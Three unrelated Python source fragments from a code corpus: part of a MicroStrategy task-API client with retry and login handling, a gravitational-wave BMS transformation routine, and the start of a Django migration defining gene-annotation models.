arguments.update(BASE_PARAMS)
for arg_name, arg_value in arguments.items():
if isinstance(arg_value, str):
pass
elif isinstance(arg_value, Enum):
arguments[arg_name] = str(arg_value.value)
elif isinstance(arg_value, BitSet):
arguments[arg_name] = arg_value.combine()
elif isinstance(arg_value, list) or isinstance(arg_value, set):
if len(arg_value) == 0:
arguments[arg_name] = ''
elif isinstance(list(arg_value)[0], Enum):
new_arg_value = set()
for arg_sub_value in arg_value:
if isinstance(arg_sub_value, Enum):
new_arg_value.add(str(arg_sub_value.value))
else:
new_arg_value.add(str(arg_sub_value))
arg_value = new_arg_value
arguments[arg_name] = ','.join(arg_value)
else:
arguments[arg_name] = str(arg_value)
if self.trace:
self.log.debug("arguments {}".format(arguments))
request = self._base_url + urllib.parse.urlencode(arguments)
if self.trace:
self.log.debug("submitting request {}".format(request))
result_bs4 = None
done = False
tries = 0
exception = None
while not done:
try:
response = requests.get(request, cookies=self.cookies)
if self.trace:
self.log.debug(f"received response {response}")
if response.status_code != 200:
exception = MstrClientException(
msg=f"Server response {response}.",
request=request
)
else:
self.cookies = response.cookies
result_bs4 = BeautifulSoup(response.text, 'xml')
task_response = result_bs4.find('taskResponse')
if task_response is None:
self.log.error(response)
self.log.error(task_response)
error = f"Unexpected server response with no taskResponse tag {result_bs4.prettify()}"
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
else:
if task_response.attrs is None or 'statusCode' not in task_response.attrs:
self.log.error(response)
self.log.error(task_response)
error = f"Unexpected server response with no statusCode in taskResponse tag {task_response}"
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
else:
if task_response['statusCode'] in ['400', '500']:
self.log.error(response)
self.log.error(task_response)
error = task_response['errorMsg']
exception = MstrClientException(
msg=f"Server error '{error}'",
request=request
)
except requests.packages.urllib3.exceptions.NewConnectionError as e:
exception = e
if exception is None:
done = True
else:
error = exception.msg
messages_to_retry = self._messages_to_retry
time.sleep(1)
if isinstance(exception, requests.packages.urllib3.exceptions.NewConnectionError):
if tries < max_retries:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Retrying. Tries={} < {} max".format(tries, max_retries))
# Count these as 1/1000 of a try (allows 5 minutes of retries) for each max_retries
tries += (1/300)
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
elif 'automatically logged out' in error:
if tries < max_retries:
tries += 1
# We can't re-login if we don't have a username (ie. we authenticated with a session_state value)
if self.username is not None:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Logging back in. Tries= {} < {} max".format(tries, max_retries))
try:
self.logout()
except MstrClientException:
pass
self.login()
else:
exception.msg += '. Re-login not possible without username.'
raise exception
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
elif any(regex_pattern.match(error) for regex_pattern in messages_to_retry):
if tries < max_retries:
self.log.info("Request failed with error {}".format(repr(exception)))
time.sleep(self.retry_delay)
self.log.info("Retrying. Tries={} < {} max".format(tries, max_retries))
tries += 1
else:
self.log.error('. Tries limit {} reached'.format(tries))
raise exception
else:
self.log.debug("Request failed with error {}".format(repr(exception)))
raise exception
return result_bs4
def get_task_client_from_config(config, config_section) -> TaskProc:
task_url = config[config_section]['task_url'].strip()
server = config[config_section]['server_name'].strip()
project = config[config_section]['project'].strip()
user_id = config[config_section]['user_id']
password = config[config_section].get('password')
if password is None:
keyring_section = config[config_section]['keyring_section'].strip()
try:
import keyring
password = keyring.get_password(keyring_section, user_id)
except ImportError:
raise ValueError("Password not provided and keyring not installed")
concurrent_max = config[config_section].get('concurrent_max', 10)
max_retries = config[config_section].get('max_retries', 10)
retry_delay = config[config_section].get('retry_delay', 10)
return TaskProc(
base_url=task_url,
server=server,
project_name=project,
username=user_id,
password=password,
concurrent_max=concurrent_max,
max_retries=max_retries,
retry_delay=retry_delay,
) | StarcoderdataPython |
1744788 | <reponame>markscheel/scri<gh_stars>10-100
import math
import numpy as np
import quaternion
import spinsfast
import spherical_functions as sf
def _process_transformation_kwargs(input_ell_max, **kwargs):
original_kwargs = kwargs.copy()
# Build the supertranslation and spacetime_translation arrays
supertranslation = np.zeros((4,), dtype=complex) # For now; may be resized below
ell_max_supertranslation = 1 # For now; may be increased below
if "supertranslation" in kwargs:
supertranslation = np.array(kwargs.pop("supertranslation"), dtype=complex)
if supertranslation.dtype != "complex" and supertranslation.size > 0:
# I don't actually think this can ever happen...
raise TypeError(
"Input argument `supertranslation` should be a complex array with size>0. "
f"Got a {supertranslation.dtype} array of shape {supertranslation.shape}"
)
# Make sure the array has size at least 4, by padding with zeros
if supertranslation.size <= 4:
supertranslation = np.lib.pad(
supertranslation, (0, 4 - supertranslation.size), "constant", constant_values=(0.0,)
)
# Check that the shape is a possible array of scalar modes with complete (ell,m) data
ell_max_supertranslation = int(np.sqrt(len(supertranslation))) - 1
if (ell_max_supertranslation + 1) ** 2 != len(supertranslation):
raise ValueError(
"Input supertranslation parameter must contain modes from ell=0 up to some ell_max, "
"including\n all relevant m modes in standard order (see `spherical_functions` "
"documentation for details).\n Thus, it must be an array with length given by a "
"perfect square; its length is {len(supertranslation)}"
)
# Check that the resulting supertranslation will be real
for ell in range(ell_max_supertranslation + 1):
for m in range(ell + 1):
i_pos = sf.LM_index(ell, m, 0)
i_neg = sf.LM_index(ell, -m, 0)
a = supertranslation[i_pos]
b = supertranslation[i_neg]
if abs(a - (-1.0) ** m * b.conjugate()) > 3e-16 + 1e-15 * abs(b):
raise ValueError(
f"\nsupertranslation[{i_pos}]={a} # (ell,m)=({ell},{m})\n"
+ "supertranslation[{}]={} # (ell,m)=({},{})\n".format(i_neg, b, ell, -m)
+ "Will result in an imaginary supertranslation."
)
spacetime_translation = np.zeros((4,), dtype=float)
spacetime_translation[0] = sf.constant_from_ell_0_mode(supertranslation[0]).real
spacetime_translation[1:4] = -sf.vector_from_ell_1_modes(supertranslation[1:4]).real
if "spacetime_translation" in kwargs:
st_trans = np.array(kwargs.pop("spacetime_translation"), dtype=float)
if st_trans.shape != (4,) or st_trans.dtype != "float":
raise TypeError(
"\nInput argument `spacetime_translation` should be a float array of shape (4,).\n"
"Got a {} array of shape {}.".format(st_trans.dtype, st_trans.shape)
)
spacetime_translation = st_trans[:]
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "space_translation" in kwargs:
s_trans = np.array(kwargs.pop("space_translation"), dtype=float)
if s_trans.shape != (3,) or s_trans.dtype != "float":
raise TypeError(
"\nInput argument `space_translation` should be an array of floats of shape (3,).\n"
"Got a {} array of shape {}.".format(s_trans.dtype, s_trans.shape)
)
spacetime_translation[1:4] = s_trans[:]
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "time_translation" in kwargs:
t_trans = kwargs.pop("time_translation")
if not isinstance(t_trans, float):
raise TypeError("Input argument `time_translation` should be a single float. " f"Got {t_trans}")
spacetime_translation[0] = t_trans
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
# Decide on the number of points to use in each direction. A nontrivial supertranslation will
# introduce power in higher modes, so for best accuracy, we need to account for that. But we'll
# make it a firm requirement to have enough points to capture the original waveform, at least
output_ell_max = kwargs.pop("output_ell_max", input_ell_max)
working_ell_max = kwargs.pop("working_ell_max", 2 * input_ell_max + ell_max_supertranslation)
if working_ell_max < input_ell_max:
raise ValueError(f"working_ell_max={working_ell_max} is too small; it must be at least ell_max={input_ell_max}")
# Get the rotor for the frame rotation
frame_rotation = np.quaternion(*np.array(kwargs.pop("frame_rotation", [1, 0, 0, 0]), dtype=float))
if frame_rotation.abs() < 3e-16:
raise ValueError(f"frame_rotation={frame_rotation} should be a single unit quaternion")
frame_rotation = frame_rotation.normalized()
# Get the boost velocity vector
boost_velocity = np.array(kwargs.pop("boost_velocity", [0.0] * 3), dtype=float)
beta = np.linalg.norm(boost_velocity)
if boost_velocity.dtype != float or boost_velocity.shape != (3,) or beta >= 1.0:
raise ValueError(
f"Input boost_velocity=`{boost_velocity}` should be a 3-vector with " "magnitude strictly less than 1.0"
)
return frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max
def boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi):
beta = np.linalg.norm(boost_velocity)
gamma = 1 / math.sqrt(1 - beta ** 2)
rapidity = math.atanh(beta)
# Construct the function that modifies our rotor grid to account for the boost
if beta > 3e-14: # Tolerance for beta; any smaller and numerical errors will have greater effect
vhat = boost_velocity / beta
def Bprm_j_k(thetaprm, phiprm):
"""Construct rotor taking r' to r
I derived this result in a different way, but I've also found it described in
Penrose-Rindler Vol. 1, around Eq. (1.3.5). Note, however, that their discussion is for
the past celestial sphere, so there's a sign difference.
"""
# Note: It doesn't matter which we use -- r' or r; all we need is the direction of the
# bivector spanned by v and r', which is the same as the direction of the bivector
# spanned by v and r, since either will be normalized, and one cross product is zero iff
# the other is zero.
rprm = np.array(
[math.cos(phiprm) * math.sin(thetaprm), math.sin(phiprm) * math.sin(thetaprm), math.cos(thetaprm)]
)
Thetaprm = math.acos(np.dot(vhat, rprm))
Theta = 2 * math.atan(math.exp(-rapidity) * math.tan(Thetaprm / 2.0))
rprm_cross_vhat = np.quaternion(0.0, *np.cross(rprm, vhat))
if rprm_cross_vhat.abs() > 1e-200:
return (rprm_cross_vhat.normalized() * (Thetaprm - Theta) / 2).exp()
else:
return quaternion.one
else:
def Bprm_j_k(thetaprm, phiprm):
return quaternion.one
# These are the angles in the transformed system at which we need to know the function values
thetaprm_phiprm = sf.theta_phi(n_theta, n_phi)
# Set up rotors that we can use to evaluate the SWSHs in the original frame
R_j_k = np.empty((n_theta, n_phi), dtype=np.quaternion)
for j in range(n_theta):
for k in range(n_phi):
thetaprm_j, phiprm_k = thetaprm_phiprm[j, k]
R_j_k[j, k] = (
Bprm_j_k(thetaprm_j, phiprm_k) * frame_rotation * quaternion.from_spherical_coords(thetaprm_j, phiprm_k)
)
return R_j_k
def conformal_factors(boost_velocity, distorted_grid_rotors):
"""Compute various combinations of the conformal factor
This is primarily a utility function for use in the `transform` function, pulled out so that it
can be tested separately.
Parameters
==========
boost_velocity: array of 3 floats
Three-velocity of the new frame relative to the old frame
distorted_grid_rotors: 2-d array of quaternions
Unit quaternions giving the rotation of the (x, y, z) basis onto the basis vectors with
respect to which the output spin-weighted fields are evaluated
Returns
=======
k: spherical_functions.Grid
ðk_over_k: spherical_functions.Grid
one_over_k: spherical_functions.Grid
one_over_k_cubed: spherical_functions.Grid
These all have the same shape as `distorted_grid_rotors` except for an additional dimension
of size 1 at the beginning, so that they can broadcast against the time dimension.
"""
from quaternion import rotate_vectors
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Note that ðk / k = ð(v·r) / (1 - v·r), but evaluating ð(v·r) is slightly delicate. As modes
# in the undistorted frame, we have ð(v·r) ~ (v·r), but the right hand side is now an s=1 field,
# so it has to be evaluated as such.
v_dot_r = sf.Grid(np.dot(rotate_vectors(distorted_grid_rotors, quaternion.z.vec), boost_velocity), spin_weight=0)[
np.newaxis, :, :
]
ðv_dot_r = sf.Grid(
sf.Modes(np.insert(sf.vector_as_ell_1_modes(boost_velocity), 0, 0.0), spin_weight=1).evaluate(
distorted_grid_rotors
),
spin_weight=1,
)[np.newaxis, :, :]
one_over_k = γ * (1 - v_dot_r)
k = 1.0 / one_over_k
ðk_over_k = ðv_dot_r / (1 - v_dot_r)
one_over_k_cubed = one_over_k ** 3
return k, ðk_over_k, one_over_k, one_over_k_cubed
def transform(self, **kwargs):
"""Apply BMS transformation to AsymptoticBondiData object
It is important to note that the input transformation parameters are applied in this order:
1. (Super)Translations
2. Rotation (about the origin)
3. Boost (about the origin)
All input parameters refer to the transformation required to take the input data's inertial
frame onto the inertial frame of the output data's inertial observers. In what follows, the
coordinates of and functions in the input inertial frame will be unprimed, while corresponding
values of the output inertial frame will be primed.
The translations (space, time, spacetime, or super) can be given in various ways, which may
override each other. Ultimately, however, they are essentially combined into a single function
`α`, representing the supertranslation, which transforms the asymptotic time variable `u` as
u'(u, θ, ϕ) = u(u, θ, ϕ) - α(θ, ϕ)
A simple time translation by δt would correspond to
α(θ, ϕ) = δt # Independent of (θ, ϕ)
A pure spatial translation δx would correspond to
α(θ, ϕ) = -δx · n̂(θ, ϕ)
where `·` is the usual dot product, and `n̂` is the unit vector in the given direction.
Parameters
==========
abd: AsymptoticBondiData
The object storing the modes of the original data, which will be transformed in this
function. This is the only required argument to this function.
time_translation: float, optional
Defaults to zero. Nonzero overrides corresponding components of `spacetime_translation` and
`supertranslation` parameters. Note that this is the actual change in the coordinate value,
rather than the corresponding mode weight (which is what `supertranslation` represents).
space_translation : float array of length 3, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`spacetime_translation` and `supertranslation` parameters. Note that this is the actual
change in the coordinate value, rather than the corresponding mode weight (which is what
`supertranslation` represents).
spacetime_translation : float array of length 4, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`supertranslation`. Note that this is the actual change in the coordinate value, rather
than the corresponding mode weight (which is what `supertranslation` represents).
supertranslation : complex array [defaults to 0]
This gives the complex components of the spherical-harmonic expansion of the
supertranslation in standard form, starting from ell=0 up to some ell_max, which may be
different from the ell_max of the input `abd` object. Supertranslations must be real, so
these values should obey the condition
α^{ℓ,m} = (-1)^m ᾱ^{ℓ,-m}
This condition is actually imposed on the input data, so imaginary parts of α(θ, ϕ) will
essentially be discarded. Defaults to empty, which causes no supertranslation. Note that
some components may be overridden by the parameters above.
frame_rotation : quaternion [defaults to 1]
Transformation applied to (x,y,z) basis of the input mode's inertial frame. For example,
the basis z vector of the new frame may be written as
z' = frame_rotation * z * frame_rotation.inverse()
Defaults to 1, corresponding to the identity transformation (no rotation).
boost_velocity : float array of length 3 [defaults to (0, 0, 0)]
This is the three-velocity vector of the new frame relative to the input frame. The norm of
this vector is required to be smaller than 1.
output_ell_max: int [defaults to abd.ell_max]
Maximum ell value in the output data.
working_ell_max: int [defaults to 2 * abd.ell_max]
Maximum ell value to use during the intermediate calculations. Rotations and time
translations do not require this to be any larger than abd.ell_max, but other
transformations will require more values of ell for accurate results. In particular, boosts
are multiplied by time, meaning that a large boost of data with large values of time will
lead to very large power in higher modes. Similarly, large (super)translations will couple
power through a lot of modes. To avoid aliasing, this value should be large, to accomodate
power in higher modes.
Returns
-------
abdprime: AsymptoticBondiData
Object representing the transformed data.
"""
from quaternion import rotate_vectors
from scipy.interpolate import CubicSpline
# Parse the input arguments, and define the basic parameters for this function
(
frame_rotation,
boost_velocity,
supertranslation,
working_ell_max,
output_ell_max,
) = _process_transformation_kwargs(self.ell_max, **kwargs)
n_theta = 2 * working_ell_max + 1
n_phi = n_theta
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Make this into a Modes object, so it can keep track of its spin weight, etc., through the
# various operations needed below.
supertranslation = sf.Modes(supertranslation, spin_weight=0).real
# This is a 2-d array of unit quaternions, which are what the spin-weighted functions should be
# evaluated on (even for spin 0 functions, for simplicity). That will be equivalent to
# evaluating the spin-weighted functions with respect to the transformed grid -- although on the
# original time slices.
distorted_grid_rotors = boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi)
# Compute u, α, ðα, ððα, k, ðk/k, 1/k, and 1/k³ on the distorted grid, including new axes to
# enable broadcasting with time-dependent functions. Note that the first axis should represent
# variation in u, the second axis variation in θ', and the third axis variation in ϕ'.
u = self.u
α = sf.Grid(supertranslation.evaluate(distorted_grid_rotors), spin_weight=0).real[np.newaxis, :, :]
# The factors of 1/sqrt(2) and 1/2 come from using the GHP eth instead of the NP eth.
ðα = sf.Grid(supertranslation.eth.evaluate(distorted_grid_rotors) / np.sqrt(2), spin_weight=α.s + 1)[np.newaxis, :, :]
ððα = sf.Grid(0.5 * supertranslation.eth.eth.evaluate(distorted_grid_rotors), spin_weight=α.s + 2)[np.newaxis, :, :]
k, ðk_over_k, one_over_k, one_over_k_cubed = conformal_factors(boost_velocity, distorted_grid_rotors)
# ðu'(u, θ', ϕ') exp(iλ) / k(θ', ϕ')
ðuprime_over_k = ðk_over_k * (u - α) - ðα
# ψ0(u, θ', ϕ') exp(2iλ)
ψ0 = sf.Grid(self.psi0.evaluate(distorted_grid_rotors), spin_weight=2)
# ψ1(u, θ', ϕ') exp(iλ)
ψ1 = sf.Grid(self.psi1.evaluate(distorted_grid_rotors), spin_weight=1)
# ψ2(u, θ', ϕ')
ψ2 = sf.Grid(self.psi2.evaluate(distorted_grid_rotors), spin_weight=0)
# ψ3(u, θ', ϕ') exp(-1iλ)
ψ3 = sf.Grid(self.psi3.evaluate(distorted_grid_rotors), spin_weight=-1)
# ψ4(u, θ', ϕ') exp(-2iλ)
ψ4 = sf.Grid(self.psi4.evaluate(distorted_grid_rotors), spin_weight=-2)
# σ(u, θ', ϕ') exp(2iλ)
σ = sf.Grid(self.sigma.evaluate(distorted_grid_rotors), spin_weight=2)
### The following calculations are done using in-place Horner form. I suspect this will be the
### most efficient form of this calculation, within reason. Note that the factors of exp(isλ)
### were computed automatically by evaluating in terms of quaternions.
#
fprime_of_timenaught_directionprime = np.empty((6, self.n_times, n_theta, n_phi), dtype=complex)
# ψ0'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += 6 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ1
fprime_temp *= ðuprime_over_k
fprime_temp += ψ0
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[0] = fprime_temp
# ψ1'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += 3 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += -3 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += ψ1
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[1] = fprime_temp
# ψ2'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -2 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += ψ2
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[2] = fprime_temp
# ψ3'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += ψ3
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[3] = fprime_temp
# ψ4'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[4] = fprime_temp
# σ'(u, θ', ϕ')
fprime_temp = σ.copy()
fprime_temp -= ððα
fprime_temp *= one_over_k
fprime_of_timenaught_directionprime[5] = fprime_temp
# Determine the new time slices. The set timeprime is chosen so that on each slice of constant
# u'_i, the average value of u=(u'/k)+α is precisely <u>=u'γ+<α>=u_i. But then, we have to
# narrow that set down, so that every grid point on all the u'_i' slices correspond to data in
# the range of input data.
timeprime = (u - sf.constant_from_ell_0_mode(supertranslation[0]).real) / γ
timeprime_of_initialtime_directionprime = k * (u[0] - α)
timeprime_of_finaltime_directionprime = k * (u[-1] - α)
earliest_complete_timeprime = np.max(timeprime_of_initialtime_directionprime.view(np.ndarray))
latest_complete_timeprime = np.min(timeprime_of_finaltime_directionprime.view(np.ndarray))
timeprime = timeprime[(timeprime >= earliest_complete_timeprime) & (timeprime <= latest_complete_timeprime)]
# This will store the values of f'(u', θ', ϕ') for the various functions `f`
fprime_of_timeprime_directionprime = np.zeros((6, timeprime.size, n_theta, n_phi), dtype=complex)
# Interpolate the various transformed function values on the transformed grid from the original
# time coordinate to the new set of time coordinates, independently for each direction.
for i in range(n_theta):
for j in range(n_phi):
k_i_j = k[0, i, j]
α_i_j = α[0, i, j]
# u'(u, θ', ϕ')
timeprime_of_timenaught_directionprime_i_j = k_i_j * (u - α_i_j)
# f'(u', θ', ϕ')
fprime_of_timeprime_directionprime[:, :, i, j] = CubicSpline(
timeprime_of_timenaught_directionprime_i_j, fprime_of_timenaught_directionprime[:, :, i, j], axis=1
)(timeprime)
# Finally, transform back from the distorted grid to the SWSH mode weights as measured in that
# grid. I'll abuse notation slightly here by indicating those "distorted" mode weights with
# primes, so that f'(u')_{ℓ', m'} = ∫ f'(u', θ', ϕ') sȲ_{ℓ', m'}(θ', ϕ') sin(θ') dθ' dϕ'
abdprime = type(self)(timeprime, output_ell_max)
# ψ0'(u')_{ℓ', m'}
abdprime.psi0 = spinsfast.map2salm(fprime_of_timeprime_directionprime[0], 2, output_ell_max)
# ψ1'(u')_{ℓ', m'}
abdprime.psi1 = spinsfast.map2salm(fprime_of_timeprime_directionprime[1], 1, output_ell_max)
# ψ2'(u')_{ℓ', m'}
abdprime.psi2 = spinsfast.map2salm(fprime_of_timeprime_directionprime[2], 0, output_ell_max)
# ψ3'(u')_{ℓ', m'}
abdprime.psi3 = spinsfast.map2salm(fprime_of_timeprime_directionprime[3], -1, output_ell_max)
# ψ4'(u')_{ℓ', m'}
abdprime.psi4 = spinsfast.map2salm(fprime_of_timeprime_directionprime[4], -2, output_ell_max)
# σ'(u')_{ℓ', m'}
abdprime.sigma = spinsfast.map2salm(fprime_of_timeprime_directionprime[5], 2, output_ell_max)
return abdprime
| StarcoderdataPython |
4832982 | # Generated by Django 3.1 on 2020-09-29 05:33
import django.db.models.deletion
import django_extensions.db.fields
from django.conf import settings
from django.db import migrations, models
import library.django_utils
import library.utils
class Migration(migrations.Migration):
initial = True
dependencies = [
('annotation', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('snpdb', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CanonicalTranscriptCollection',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('description', models.TextField(blank=True)),
('filename', models.TextField(blank=True)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('file_md5sum', models.TextField()),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='Gene',
fields=[
('identifier', models.TextField(primary_key=True, serialize=False)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
],
),
migrations.CreateModel(
name='GeneAnnotationImport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('filename', models.TextField()),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='GeneAnnotationRelease',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
('gene_annotation_import', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
options={
'unique_together': {('version', 'annotation_consortium', 'genome_build')},
},
),
migrations.CreateModel(
name='GeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('import_status', models.CharField(choices=[('C', 'created'), ('I', 'importing'), ('R', 'Requires user input'), ('E', 'error'), ('S', 'success'), ('M', 'Marked For Deletion'), ('D', 'Deleting')], default='C', max_length=1)),
('error_message', models.TextField(blank=True, null=True)),
('locked', models.BooleanField(default=False)),
('url', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='GeneSymbol',
fields=[
('symbol', models.TextField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='GeneVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('description', models.TextField(null=True)),
('biotype', models.TextField(null=True)),
('gene', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
),
migrations.CreateModel(
name='HGNCGeneNamesImport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='PanelAppPanel',
fields=[
('panel_id', models.TextField(primary_key=True, serialize=False)),
('disease_group', models.TextField()),
('disease_sub_group', models.TextField()),
('name', models.TextField()),
('current_version', models.TextField()),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
],
),
migrations.CreateModel(
name='Pfam',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pfam_id', models.TextField(unique=True)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='PfamSequence',
fields=[
('seq_id', models.TextField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='ProteinDomain',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(unique=True)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='ReleaseGeneSymbol',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
],
options={
'unique_together': {('release', 'gene_symbol')},
},
),
migrations.CreateModel(
name='Transcript',
fields=[
('identifier', models.TextField(primary_key=True, serialize=False)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
],
),
migrations.CreateModel(
name='TranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('biotype', models.TextField(null=True)),
('data', models.JSONField(blank=True, default=library.utils.empty_dict)),
('gene_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneversion')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
('import_source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport')),
('transcript', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'unique_together': {('transcript', 'version', 'genome_build')},
},
bases=(library.django_utils.SortByPKMixin, models.Model),
),
migrations.CreateModel(
name='ProteinDomainTranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.IntegerField()),
('end', models.IntegerField()),
('protein_domain', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.proteindomain')),
('transcript_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
),
migrations.CreateModel(
name='PfamSequenceIdentifier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pfam_sequence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfamsequence')),
('transcript', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
('transcript_version', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
),
migrations.CreateModel(
name='PfamDomains',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.IntegerField()),
('end', models.IntegerField()),
('pfam', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfam')),
('pfam_sequence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfamsequence')),
],
),
migrations.CreateModel(
name='PanelAppPanelRelevantDisorders',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('panel_app_panel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.panelapppanel')),
],
),
migrations.CreateModel(
name='HGNCGeneNames',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('approved_symbol', models.TextField()),
('approved_name', models.TextField()),
('status', models.CharField(choices=[('A', 'Approved'), ('S', 'Symbol Withdrawn'), ('E', 'Entry Withdrawn')], max_length=1)),
('previous_symbols', models.TextField()),
('synonyms', models.TextField()),
('refseq_ids', models.TextField()),
